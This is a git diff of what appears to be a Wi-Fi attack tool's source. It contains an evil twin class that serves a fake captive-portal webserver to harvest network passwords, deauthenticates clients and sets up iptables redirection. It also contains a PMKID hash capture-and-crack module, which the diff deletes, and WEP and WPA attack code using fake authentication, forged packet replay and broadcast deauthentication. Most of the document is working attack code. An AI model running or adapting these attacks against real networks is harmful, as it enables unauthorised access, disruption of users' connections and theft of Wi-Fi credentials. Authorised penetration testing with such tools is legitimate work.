|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'starting {C}evil webserver{W}...')
|
||||||
|
self.webserver = EviltwinServer(self.success_callback, self.error_callback)
|
||||||
|
self.webserver.start()
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
self.pattack(airodump_target, 'starting {C}deauther{W}...')
|
||||||
|
self.deauther = Deauther(self.deauth_iface, self.target)
|
||||||
|
#self.deauther.start()
|
||||||
|
Color.clear_entire_line()
|
||||||
|
|
||||||
|
while not self.completed:
|
||||||
|
time.sleep(1)
|
||||||
|
airodump_target = self.wait_for_target(airodump)
|
||||||
|
|
||||||
|
# TODO: Check hostapd, dnsmasq, and webserver statistics
|
||||||
|
self.pattack(airodump_target, 'waiting for clients')
|
||||||
|
|
||||||
|
# Update deauther with latest client information
|
||||||
|
self.deauther.update_target(airodump_target)
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
# Cleanup
|
||||||
|
Color.pl('\n{!} {O}Interrupted{W}')
|
||||||
|
|
||||||
|
if self.success:
|
||||||
|
# TODO: print status & save
|
||||||
|
self.cleanup()
|
||||||
|
return
|
||||||
|
|
||||||
|
if self.error_msg:
|
||||||
|
self.cleanup()
|
||||||
|
raise Exception(self.error_msg)
|
||||||
|
|
||||||
|
self.cleanup()
|
||||||
|
|
||||||
|
|
||||||
|
def pattack(self, airodump_target, status):
|
||||||
|
Color.pattack('EvilTwin', airodump_target, 'attack', status)
|
||||||
|
|
||||||
|
|
||||||
|
def success_callback(self, crack_result):
|
||||||
|
# Called by webserver when we get a password
|
||||||
|
self.crack_result = crack_result
|
||||||
|
self.success = True
|
||||||
|
self.completed = True
|
||||||
|
|
||||||
|
|
||||||
|
def status_callback(self, status_message):
|
||||||
|
# Called by webserver on status update
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
def error_callback(self, error_msg):
|
||||||
|
# Called by webserver on error / failure
|
||||||
|
self.completed = True
|
||||||
|
self.error_msg = error_msg
|
||||||
|
|
||||||
|
|
||||||
|
def cleanup(self):
|
||||||
|
if self.dnsmasq:
|
||||||
|
self.dnsmasq.stop()
|
||||||
|
|
||||||
|
if self.hostapd:
|
||||||
|
self.hostapd.stop()
|
||||||
|
|
||||||
|
if self.webserver:
|
||||||
|
self.webserver.stop()
|
||||||
|
# From https://stackoverflow.com/a/268686
|
||||||
|
|
||||||
|
if self.deauther:
|
||||||
|
self.deauther.stop()
|
||||||
|
|
||||||
|
self.set_port_forwarding(enabled=False)
|
||||||
|
|
||||||
|
Iptables.flush() #iptables -F
|
||||||
|
Iptables.flush(table='nat') #iptables -t nat -F
|
||||||
|
Iptables.flush(table='mangle') #iptables -t mangle -F
|
||||||
|
|
||||||
|
Iptables.delete_chain() #iptables -X
|
||||||
|
Iptables.delete_chain(table='nat') #iptables -t nat -X
|
||||||
|
Iptables.delete_chain(table='mangle') #iptables -t mangle -X
|
||||||
|
|
||||||
|
|
||||||
|
def set_port_forwarding(self, enabled=True):
|
||||||
|
# echo "1" > /proc/sys/net/ipv4/ip_forward
|
||||||
|
# TODO: Are there other/better ways to do this?
|
||||||
|
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ip_forward:
|
||||||
|
ip_forward.write('1' if enabled else '0')
|
||||||
|
|
||||||
|
|
||||||
|
def configure_iptables(self, interface):
|
||||||
|
# iptables -N internet -t mangle
|
||||||
|
Iptables.new_chain('internet', 'mangle')
|
||||||
|
|
||||||
|
#iptables -t mangle -A PREROUTING -j internet
|
||||||
|
Iptables.append('PREROUTING', table='mangle', rules=[
|
||||||
|
'-j', 'internet'
|
||||||
|
])
|
||||||
|
|
||||||
|
#iptables -t mangle -A internet -j MARK --set-mark 99
|
||||||
|
Iptables.append('PREROUTING', table='mangle', rules=[
|
||||||
|
'-j', 'MARK',
|
||||||
|
'--set-mark', '99',
|
||||||
|
])
|
||||||
|
|
||||||
|
#iptables -t nat -A PREROUTING -m mark --mark 99 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1
|
||||||
|
Iptables.append('PREROUTING', table='nat', rules=[
|
||||||
|
'--match', 'mark',
|
||||||
|
'--mark', '99',
|
||||||
|
'--protocol', 'tcp',
|
||||||
|
'--dport', '80',
|
||||||
|
'--jump', 'DNAT',
|
||||||
|
'--to-destination', '10.0.0.1',
|
||||||
|
])
|
||||||
|
|
||||||
|
#iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||||
|
Iptables.append('FORWARD', rules=[
|
||||||
|
'--in-interface', 'eth0',
|
||||||
|
'--out-interface', interface,
|
||||||
|
'--match', 'state',
|
||||||
|
'--state', 'ESTABLISHED,RELATED',
|
||||||
|
'--jump', 'ACCEPT',
|
||||||
|
])
|
||||||
|
|
||||||
|
#iptables -A FORWARD -m mark --mark 99 -j REJECT
|
||||||
|
Iptables.append('FORWARD', rules=[
|
||||||
|
'--match', 'mark',
|
||||||
|
'--mark', '99',
|
||||||
|
'--jump', 'REJECT',
|
||||||
|
])
|
||||||
|
|
||||||
|
#iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
|
||||||
|
Iptables.append('FORWARD', rules=[
|
||||||
|
'--in-interface', interface,
|
||||||
|
'--out-interface', 'eth0',
|
||||||
|
'--jump', 'ACCEPT',
|
||||||
|
])
|
||||||
|
|
||||||
|
#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||||||
|
Iptables.append('POSTROUTING', table='nat', rules=[
|
||||||
|
'--out-interface', 'eth0',
|
||||||
|
'--jump', 'MASQUERADE',
|
||||||
|
])
|
||||||
|
|
||||||
@@ -1,215 +0,0 @@
|
|||||||
#!/usr/bin/env python
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from ..model.attack import Attack
|
|
||||||
from ..config import Configuration
|
|
||||||
from ..tools.hashcat import HcxDumpTool, HcxPcapTool, Hashcat
|
|
||||||
from ..util.color import Color
|
|
||||||
from ..util.timer import Timer
|
|
||||||
from ..model.pmkid_result import CrackResultPMKID
|
|
||||||
|
|
||||||
from threading import Thread
|
|
||||||
import os
|
|
||||||
import time
|
|
||||||
import re
|
|
||||||
|
|
||||||
|
|
||||||
class AttackPMKID(Attack):
|
|
||||||
|
|
||||||
def __init__(self, target):
|
|
||||||
super(AttackPMKID, self).__init__(target)
|
|
||||||
self.crack_result = None
|
|
||||||
self.success = False
|
|
||||||
self.pcapng_file = Configuration.temp('pmkid.pcapng')
|
|
||||||
|
|
||||||
|
|
||||||
def get_existing_pmkid_file(self, bssid):
|
|
||||||
'''
|
|
||||||
Load PMKID Hash from a previously-captured hash in ./hs/
|
|
||||||
Returns:
|
|
||||||
The hashcat hash (hash*bssid*station*essid) if found.
|
|
||||||
None if not found.
|
|
||||||
'''
|
|
||||||
if not os.path.exists(Configuration.wpa_handshake_dir):
|
|
||||||
return None
|
|
||||||
|
|
||||||
bssid = bssid.lower().replace(':', '')
|
|
||||||
|
|
||||||
file_re = re.compile('.*pmkid_.*\.16800')
|
|
||||||
for filename in os.listdir(Configuration.wpa_handshake_dir):
|
|
||||||
pmkid_filename = os.path.join(Configuration.wpa_handshake_dir, filename)
|
|
||||||
if not os.path.isfile(pmkid_filename):
|
|
||||||
continue
|
|
||||||
if not re.match(file_re, pmkid_filename):
|
|
||||||
continue
|
|
||||||
|
|
||||||
with open(pmkid_filename, 'r') as pmkid_handle:
|
|
||||||
pmkid_hash = pmkid_handle.read().strip()
|
|
||||||
if pmkid_hash.count('*') < 3:
|
|
||||||
continue
|
|
||||||
existing_bssid = pmkid_hash.split('*')[1].lower().replace(':', '')
|
|
||||||
if existing_bssid == bssid:
|
|
||||||
return pmkid_filename
|
|
||||||
return None
|
|
||||||
|
|
||||||
|
|
||||||
def run(self):
|
|
||||||
'''
|
|
||||||
Performs PMKID attack, if possible.
|
|
||||||
1) Captures PMKID hash (or re-uses existing hash if found).
|
|
||||||
2) Cracks the hash.
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
True if handshake is captured. False otherwise.
|
|
||||||
'''
|
|
||||||
# Skip if user only wants to run PixieDust attack
|
|
||||||
if Configuration.wps_only and self.target.wps:
|
|
||||||
Color.pl('\r{!} {O}Skipping PMKID attack on {R}%s{O} because {R}--wps-only{O} is set{W}' % self.target.essid)
|
|
||||||
self.success = False
|
|
||||||
return False
|
|
||||||
|
|
||||||
from ..util.process import Process
|
|
||||||
# Check that we have all hashcat programs
|
|
||||||
dependencies = [
|
|
||||||
Hashcat.dependency_name,
|
|
||||||
HcxDumpTool.dependency_name,
|
|
||||||
HcxPcapTool.dependency_name
|
|
||||||
]
|
|
||||||
missing_deps = [dep for dep in dependencies if not Process.exists(dep)]
|
|
||||||
if len(missing_deps) > 0:
|
|
||||||
Color.pl('{!} Skipping PMKID attack, missing required tools: {O}%s{W}' % ', '.join(missing_deps))
|
|
||||||
return False
|
|
||||||
|
|
||||||
pmkid_file = None
|
|
||||||
|
|
||||||
if Configuration.ignore_old_handshakes == False:
|
|
||||||
# Load exisitng PMKID hash from filesystem
|
|
||||||
pmkid_file = self.get_existing_pmkid_file(self.target.bssid)
|
|
||||||
if pmkid_file is not None:
|
|
||||||
Color.pattack('PMKID', self.target, 'CAPTURE',
|
|
||||||
'Loaded {C}existing{W} PMKID hash: {C}%s{W}\n' % pmkid_file)
|
|
||||||
|
|
||||||
if pmkid_file is None:
|
|
||||||
# Capture hash from live target.
|
|
||||||
pmkid_file = self.capture_pmkid()
|
|
||||||
|
|
||||||
if pmkid_file is None:
|
|
||||||
return False # No hash found.
|
|
||||||
|
|
||||||
# Crack it.
|
|
||||||
self.success = self.crack_pmkid_file(pmkid_file)
|
|
||||||
|
|
||||||
return True # Even if we don't crack it, capturing a PMKID is 'successful'
|
|
||||||
|
|
||||||
|
|
||||||
def capture_pmkid(self):
|
|
||||||
'''
|
|
||||||
Runs hashcat's hcxpcaptool to extract PMKID hash from the .pcapng file.
|
|
||||||
Returns:
|
|
||||||
The PMKID hash (str) if found, otherwise None.
|
|
||||||
'''
|
|
||||||
self.keep_capturing = True
|
|
||||||
self.timer = Timer(15)
|
|
||||||
|
|
||||||
# Start hcxdumptool
|
|
||||||
t = Thread(target=self.dumptool_thread)
|
|
||||||
t.start()
|
|
||||||
|
|
||||||
# Repeatedly run pcaptool & check output for hash for self.target.essid
|
|
||||||
pmkid_hash = None
|
|
||||||
pcaptool = HcxPcapTool(self.target)
|
|
||||||
while self.timer.remaining() > 0:
|
|
||||||
pmkid_hash = pcaptool.get_pmkid_hash(self.pcapng_file)
|
|
||||||
if pmkid_hash is not None:
|
|
||||||
break # Got PMKID
|
|
||||||
|
|
||||||
Color.pattack('PMKID', self.target, 'CAPTURE',
|
|
||||||
'Waiting for PMKID ({C}%s{W})' % str(self.timer))
|
|
||||||
time.sleep(1)
|
|
||||||
|
|
||||||
self.keep_capturing = False
|
|
||||||
|
|
||||||
if pmkid_hash is None:
|
|
||||||
Color.pattack('PMKID', self.target, 'CAPTURE',
|
|
||||||
'{R}Failed{O} to capture PMKID\n')
|
|
||||||
Color.pl('')
|
|
||||||
return None # No hash found.
|
|
||||||
|
|
||||||
Color.clear_entire_line()
|
|
||||||
Color.pattack('PMKID', self.target, 'CAPTURE', '{G}Captured PMKID{W}')
|
|
||||||
pmkid_file = self.save_pmkid(pmkid_hash)
|
|
||||||
return pmkid_file
|
|
||||||
|
|
||||||
|
|
||||||
def crack_pmkid_file(self, pmkid_file):
|
|
||||||
'''
|
|
||||||
Runs hashcat containing PMKID hash (*.16800).
|
|
||||||
If cracked, saves results in self.crack_result
|
|
||||||
Returns:
|
|
||||||
True if cracked, False otherwise.
|
|
||||||
'''
|
|
||||||
|
|
||||||
# Check that wordlist exists before cracking.
|
|
||||||
if Configuration.wordlist is None:
|
|
||||||
Color.pl('\n{!} {O}Not cracking PMKID ' +
|
|
||||||
'because there is no {R}wordlist{O} (re-run with {C}--dict{O})')
|
|
||||||
|
|
||||||
# TODO: Uncomment once --crack is updated to support recracking PMKIDs.
|
|
||||||
#Color.pl('{!} {O}Run Wifite with the {R}--crack{O} and {R}--dict{O} options to try again.')
|
|
||||||
|
|
||||||
key = None
|
|
||||||
else:
|
|
||||||
Color.clear_entire_line()
|
|
||||||
Color.pattack('PMKID', self.target, 'CRACK', 'Cracking PMKID using {C}%s{W} ...\n' % Configuration.wordlist)
|
|
||||||
key = Hashcat.crack_pmkid(pmkid_file)
|
|
||||||
|
|
||||||
if key is None:
|
|
||||||
# Failed to crack.
|
|
||||||
if Configuration.wordlist is not None:
|
|
||||||
Color.clear_entire_line()
|
|
||||||
Color.pattack('PMKID', self.target, '{R}CRACK',
|
|
||||||
'{R}Failed {O}Passphrase not found in dictionary.\n')
|
|
||||||
Color.pl('')
|
|
||||||
return False
|
|
||||||
else:
|
|
||||||
# Successfully cracked.
|
|
||||||
Color.clear_entire_line()
|
|
||||||
Color.pattack('PMKID', self.target, 'CRACKED', '{C}Key: {G}%s{W}' % key)
|
|
||||||
self.crack_result = CrackResultPMKID(self.target.bssid, self.target.essid,
|
|
||||||
pmkid_file, key)
|
|
||||||
Color.pl('\n')
|
|
||||||
self.crack_result.dump()
|
|
||||||
return True
|
|
||||||
|
|
||||||
|
|
||||||
def dumptool_thread(self):
|
|
||||||
'''Runs hashcat's hcxdumptool until it dies or `keep_capturing == False`'''
|
|
||||||
dumptool = HcxDumpTool(self.target, self.pcapng_file)
|
|
||||||
|
|
||||||
# Let the dump tool run until we have the hash.
|
|
||||||
while self.keep_capturing and dumptool.poll() == None:
|
|
||||||
time.sleep(0.5)
|
|
||||||
|
|
||||||
dumptool.interrupt()
|
|
||||||
|
|
||||||
|
|
||||||
def save_pmkid(self, pmkid_hash):
|
|
||||||
'''Saves a copy of the pmkid (handshake) to hs/ directory.'''
|
|
||||||
# Create handshake dir
|
|
||||||
if not os.path.exists(Configuration.wpa_handshake_dir):
|
|
||||||
os.mkdir(Configuration.wpa_handshake_dir)
|
|
||||||
|
|
||||||
# Generate filesystem-safe filename from bssid, essid and date
|
|
||||||
essid_safe = re.sub('[^a-zA-Z0-9]', '', self.target.essid)
|
|
||||||
bssid_safe = self.target.bssid.replace(':', '-')
|
|
||||||
date = time.strftime('%Y-%m-%dT%H-%M-%S')
|
|
||||||
pmkid_file = 'pmkid_%s_%s_%s.16800' % (essid_safe, bssid_safe, date)
|
|
||||||
pmkid_file = os.path.join(Configuration.wpa_handshake_dir, pmkid_file)
|
|
||||||
|
|
||||||
Color.p('\n{+} Saving copy of {C}PMKID Hash{W} to {C}%s{W} ' % pmkid_file)
|
|
||||||
with open(pmkid_file, 'w') as pmkid_handle:
|
|
||||||
pmkid_handle.write(pmkid_hash)
|
|
||||||
pmkid_handle.write('\n')
|
|
||||||
|
|
||||||
return pmkid_file
|
|
||||||
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..model.attack import Attack
|
from ..model.attack import Attack
|
||||||
@@ -18,7 +18,7 @@ class AttackWEP(Attack):
|
|||||||
Contains logic for attacking a WEP-encrypted access point.
|
Contains logic for attacking a WEP-encrypted access point.
|
||||||
'''
|
'''
|
||||||
|
|
||||||
fakeauth_wait = 5 # TODO: Configuration?
|
fakeauth_wait = 5
|
||||||
|
|
||||||
def __init__(self, target):
|
def __init__(self, target):
|
||||||
super(AttackWEP, self).__init__(target)
|
super(AttackWEP, self).__init__(target)
|
||||||
@@ -29,7 +29,7 @@ class AttackWEP(Attack):
|
|||||||
'''
|
'''
|
||||||
Initiates full WEP attack.
|
Initiates full WEP attack.
|
||||||
Including airodump-ng starting, cracking, etc.
|
Including airodump-ng starting, cracking, etc.
|
||||||
Returns: True if attack is successful, false otherwise
|
Returns: True if attack is succesful, false otherwise
|
||||||
'''
|
'''
|
||||||
|
|
||||||
aircrack = None # Aircrack process, not started yet
|
aircrack = None # Aircrack process, not started yet
|
||||||
@@ -69,7 +69,7 @@ class AttackWEP(Attack):
|
|||||||
# Use our interface's MAC address for the attacks.
|
# Use our interface's MAC address for the attacks.
|
||||||
client_mac = Ifconfig.get_mac(Configuration.interface)
|
client_mac = Ifconfig.get_mac(Configuration.interface)
|
||||||
# Keep us authenticated
|
# Keep us authenticated
|
||||||
fakeauth_proc = Aireplay(self.target, 'fakeauth')
|
fakeauth_proc = Aireplay(self.target, "fakeauth")
|
||||||
elif len(airodump_target.clients) == 0:
|
elif len(airodump_target.clients) == 0:
|
||||||
# Failed to fakeauth, can't use our MAC.
|
# Failed to fakeauth, can't use our MAC.
|
||||||
# And there are no associated clients. Use one and tell the user.
|
# And there are no associated clients. Use one and tell the user.
|
||||||
@@ -108,16 +108,16 @@ class AttackWEP(Attack):
|
|||||||
current_ivs = airodump_target.ivs
|
current_ivs = airodump_target.ivs
|
||||||
total_ivs = previous_ivs + current_ivs
|
total_ivs = previous_ivs + current_ivs
|
||||||
|
|
||||||
status = '%d/{C}%d{W} IVs' % (total_ivs, Configuration.wep_crack_at_ivs)
|
status = "%d/{C}%d{W} IVs" % (total_ivs, Configuration.wep_crack_at_ivs)
|
||||||
if fakeauth_proc:
|
if fakeauth_proc:
|
||||||
if fakeauth_proc and fakeauth_proc.status:
|
if fakeauth_proc and fakeauth_proc.status:
|
||||||
status += ', {G}fakeauth{W}'
|
status += ", {G}fakeauth{W}"
|
||||||
else:
|
else:
|
||||||
status += ', {R}no-auth{W}'
|
status += ", {R}no-auth{W}"
|
||||||
if aireplay.status is not None:
|
if aireplay.status is not None:
|
||||||
status += ', %s' % aireplay.status
|
status += ", %s" % aireplay.status
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pattack('WEP', airodump_target, '%s' % attack_name, status)
|
Color.pattack("WEP", airodump_target, "%s" % attack_name, status)
|
||||||
|
|
||||||
# Check if we cracked it.
|
# Check if we cracked it.
|
||||||
if aircrack and aircrack.is_cracked():
|
if aircrack and aircrack.is_cracked():
|
||||||
@@ -141,7 +141,7 @@ class AttackWEP(Attack):
|
|||||||
|
|
||||||
if aircrack and aircrack.is_running():
|
if aircrack and aircrack.is_running():
|
||||||
# Aircrack is running in the background.
|
# Aircrack is running in the background.
|
||||||
Color.p('and {C}cracking{W}')
|
Color.p("and {C}cracking{W}")
|
||||||
|
|
||||||
# Check number of IVs, crack if necessary
|
# Check number of IVs, crack if necessary
|
||||||
if total_ivs > Configuration.wep_crack_at_ivs:
|
if total_ivs > Configuration.wep_crack_at_ivs:
|
||||||
@@ -180,7 +180,7 @@ class AttackWEP(Attack):
|
|||||||
# If .xor is not there, the process failed.
|
# If .xor is not there, the process failed.
|
||||||
Color.pl('\n{!} {O}%s attack{R} did not generate a .xor file' % attack_name)
|
Color.pl('\n{!} {O}%s attack{R} did not generate a .xor file' % attack_name)
|
||||||
# XXX: For debugging
|
# XXX: For debugging
|
||||||
Color.pl('{?} {O}Command: {R}%s{W}' % ' '.join(aireplay.cmd))
|
Color.pl('{?} {O}Command: {R}%s{W}' % " ".join(aireplay.cmd))
|
||||||
Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output())
|
Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output())
|
||||||
break
|
break
|
||||||
|
|
||||||
@@ -193,8 +193,8 @@ class AttackWEP(Attack):
|
|||||||
if replay_file:
|
if replay_file:
|
||||||
Color.pl('{+} {C}forged packet{W},' +
|
Color.pl('{+} {C}forged packet{W},' +
|
||||||
' {G}replaying...{W}')
|
' {G}replaying...{W}')
|
||||||
wep_attack_type = WEPAttackType('forgedreplay')
|
wep_attack_type = WEPAttackType("forgedreplay")
|
||||||
attack_name = 'forgedreplay'
|
attack_name = "forgedreplay"
|
||||||
aireplay = Aireplay(self.target,
|
aireplay = Aireplay(self.target,
|
||||||
'forgedreplay',
|
'forgedreplay',
|
||||||
client_mac=client_mac,
|
client_mac=client_mac,
|
||||||
@@ -206,7 +206,7 @@ class AttackWEP(Attack):
|
|||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
|
Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
|
||||||
Color.pl('{?} {O}Command: {R}%s{W}' % ' '.join(aireplay.cmd))
|
Color.pl('{?} {O}Command: {R}%s{W}' % " ".join(aireplay.cmd))
|
||||||
Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output())
|
Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output())
|
||||||
break # Continue to other attacks
|
break # Continue to other attacks
|
||||||
|
|
||||||
@@ -251,7 +251,16 @@ class AttackWEP(Attack):
|
|||||||
return self.success
|
return self.success
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
Color.pexception(e)
|
Color.pl("\n{!} {R}Error: {O}%s" % str(e))
|
||||||
|
if Configuration.verbose > 0 or Configuration.print_stack_traces:
|
||||||
|
Color.pl('\n{!} {O}Full stack trace below')
|
||||||
|
from traceback import format_exc
|
||||||
|
Color.p('\n{!} ')
|
||||||
|
err = format_exc().strip()
|
||||||
|
err = err.replace('\n', '\n{!} {C} ')
|
||||||
|
err = err.replace(' File', '{W}File')
|
||||||
|
err = err.replace(' Exception: ', '{R}Exception: {O}')
|
||||||
|
Color.pl(err)
|
||||||
continue
|
continue
|
||||||
# End of big try-catch
|
# End of big try-catch
|
||||||
# End of for-each-attack-type loop
|
# End of for-each-attack-type loop
|
||||||
@@ -268,29 +277,29 @@ class AttackWEP(Attack):
|
|||||||
or if we should stop attacking this target (returns True).
|
or if we should stop attacking this target (returns True).
|
||||||
'''
|
'''
|
||||||
if target is None:
|
if target is None:
|
||||||
Color.pl('')
|
Color.pl("")
|
||||||
return True
|
return True
|
||||||
target_name = target.essid if target.essid_known else target.bssid
|
target_name = target.essid if target.essid_known else target.bssid
|
||||||
|
|
||||||
Color.pl('\n\n{!} {O}Interrupted')
|
Color.pl("\n\n{!} {O}Interrupted")
|
||||||
Color.pl('{+} {W}Next steps:')
|
Color.pl("{+} {W}Next steps:")
|
||||||
|
|
||||||
# Deauth clients & retry
|
# Deauth clients & retry
|
||||||
attack_index = 1
|
attack_index = 1
|
||||||
Color.pl(' {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}' % (current_attack, target_name))
|
Color.pl(" {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}" % (current_attack, target_name))
|
||||||
|
|
||||||
# Move onto a different WEP attack
|
# Move onto a different WEP attack
|
||||||
for attack_name in attacks_remaining:
|
for attack_name in attacks_remaining:
|
||||||
attack_index += 1
|
attack_index += 1
|
||||||
Color.pl(' {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}' % (attack_index, attack_name, target_name))
|
Color.pl(" {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}" % (attack_index, attack_name, target_name))
|
||||||
|
|
||||||
# Stop attacking entirely
|
# Stop attacking entirely
|
||||||
attack_index += 1
|
attack_index += 1
|
||||||
Color.pl(' {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}' % attack_index)
|
Color.pl(" {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}" % attack_index)
|
||||||
while True:
|
while True:
|
||||||
answer = raw_input(Color.s('{?} Select an option ({G}1-%d{W}): ' % attack_index))
|
answer = raw_input(Color.s("{?} Select an option ({G}1-%d{W}): " % attack_index))
|
||||||
if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index:
|
if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index:
|
||||||
Color.pl('{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}' % attack_index)
|
Color.pl("{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}" % attack_index)
|
||||||
continue
|
continue
|
||||||
answer = int(answer)
|
answer = int(answer)
|
||||||
break
|
break
|
||||||
@@ -300,7 +309,7 @@ class AttackWEP(Attack):
|
|||||||
deauth_count = 1
|
deauth_count = 1
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
|
|
||||||
Color.p('\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...')
|
Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
|
||||||
Aireplay.deauth(target.bssid, essid=target.essid)
|
Aireplay.deauth(target.bssid, essid=target.essid)
|
||||||
|
|
||||||
attacking_mac = Ifconfig.get_mac(Configuration.interface)
|
attacking_mac = Ifconfig.get_mac(Configuration.interface)
|
||||||
@@ -309,13 +318,13 @@ class AttackWEP(Attack):
|
|||||||
continue # Don't deauth ourselves.
|
continue # Don't deauth ourselves.
|
||||||
|
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.p('\r{+} {O}Deauthenticating client {C}%s{W}...' % client.station)
|
Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.station)
|
||||||
|
|
||||||
Aireplay.deauth(target.bssid, client_mac=client.station, essid=target.essid)
|
Aireplay.deauth(target.bssid, client_mac=client.station, essid=target.essid)
|
||||||
deauth_count += 1
|
deauth_count += 1
|
||||||
|
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pl('\r{+} Sent {C}%d {O}deauths{W}' % deauth_count)
|
Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % deauth_count)
|
||||||
|
|
||||||
# Re-insert current attack to top of list of attacks remaining
|
# Re-insert current attack to top of list of attacks remaining
|
||||||
attacks_remaining.insert(0, current_attack)
|
attacks_remaining.insert(0, current_attack)
|
||||||
@@ -327,11 +336,11 @@ class AttackWEP(Attack):
|
|||||||
attacks_remaining.insert(0, attacks_remaining.pop(answer-2))
|
attacks_remaining.insert(0, attacks_remaining.pop(answer-2))
|
||||||
return False # Don't stop
|
return False # Don't stop
|
||||||
|
|
||||||
|
|
||||||
def fake_auth(self):
|
def fake_auth(self):
|
||||||
'''
|
'''
|
||||||
Attempts to fake-authenticate with target.
|
Attempts to fake-authenticate with target.
|
||||||
Returns: True if successful, False is unsuccessful.
|
Returns: True if successful,
|
||||||
|
False is unsuccesful.
|
||||||
'''
|
'''
|
||||||
Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' % self.target.bssid)
|
Color.p('\r{+} attempting {G}fake-authentication{W} with {C}%s{W}...' % self.target.bssid)
|
||||||
fakeauth = Aireplay.fakeauth(self.target, timeout=AttackWEP.fakeauth_wait)
|
fakeauth = Aireplay.fakeauth(self.target, timeout=AttackWEP.fakeauth_wait)
|
||||||
@@ -340,7 +349,7 @@ class AttackWEP(Attack):
|
|||||||
else:
|
else:
|
||||||
Color.pl(' {R}failed{W}')
|
Color.pl(' {R}failed{W}')
|
||||||
if Configuration.require_fakeauth:
|
if Configuration.require_fakeauth:
|
||||||
# Fakeauth is required, fail
|
# Fakeauth is requried, fail
|
||||||
raise Exception(
|
raise Exception(
|
||||||
'Fake-authenticate did not complete within' +
|
'Fake-authenticate did not complete within' +
|
||||||
' %d seconds' % AttackWEP.fakeauth_wait)
|
' %d seconds' % AttackWEP.fakeauth_wait)
|
||||||
@@ -354,10 +363,11 @@ class AttackWEP(Attack):
|
|||||||
return fakeauth
|
return fakeauth
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
Configuration.initialize(True)
|
Configuration.initialize(True)
|
||||||
from ..model.target import Target
|
from ..model.target import Target
|
||||||
fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 6, 54e,WEP, WEP, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, '.split(',')
|
fields = "A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 6, 54e,WEP, WEP, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, ".split(',')
|
||||||
target = Target(fields)
|
target = Target(fields)
|
||||||
wep = AttackWEP(target)
|
wep = AttackWEP(target)
|
||||||
wep.run()
|
wep.run()
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..model.attack import Attack
|
from ..model.attack import Attack
|
||||||
@@ -24,18 +24,20 @@ class AttackWPA(Attack):
|
|||||||
self.success = False
|
self.success = False
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
'''Initiates full WPA handshake capture attack.'''
|
'''
|
||||||
|
Initiates full WPA hanshake capture attack.
|
||||||
|
'''
|
||||||
|
|
||||||
if Configuration.use_pmkid_only:
|
# Check if user only wants to run PixieDust attack
|
||||||
self.success = False
|
|
||||||
return False
|
|
||||||
# Skip if user only wants to run PixieDust attack
|
|
||||||
if Configuration.wps_only and self.target.wps:
|
if Configuration.wps_only and self.target.wps:
|
||||||
Color.pl('\r{!} {O}Skipping WPA-Handshake attack on {R}%s{O} because {R}--wps-only{O} is set{W}' % self.target.essid)
|
Color.pl('\r{!} {O}--wps-only{R} set, ignoring WPA-handshake attack on {O}%s{W}' % self.target.essid)
|
||||||
self.success = False
|
self.success = False
|
||||||
return self.success
|
return self.success
|
||||||
|
|
||||||
# Capture the handshake (or use an old one)
|
handshake = None
|
||||||
|
|
||||||
|
# Capture the handshake ("do it live!")
|
||||||
|
if handshake is None:
|
||||||
handshake = self.capture_handshake()
|
handshake = self.capture_handshake()
|
||||||
|
|
||||||
if handshake is None:
|
if handshake is None:
|
||||||
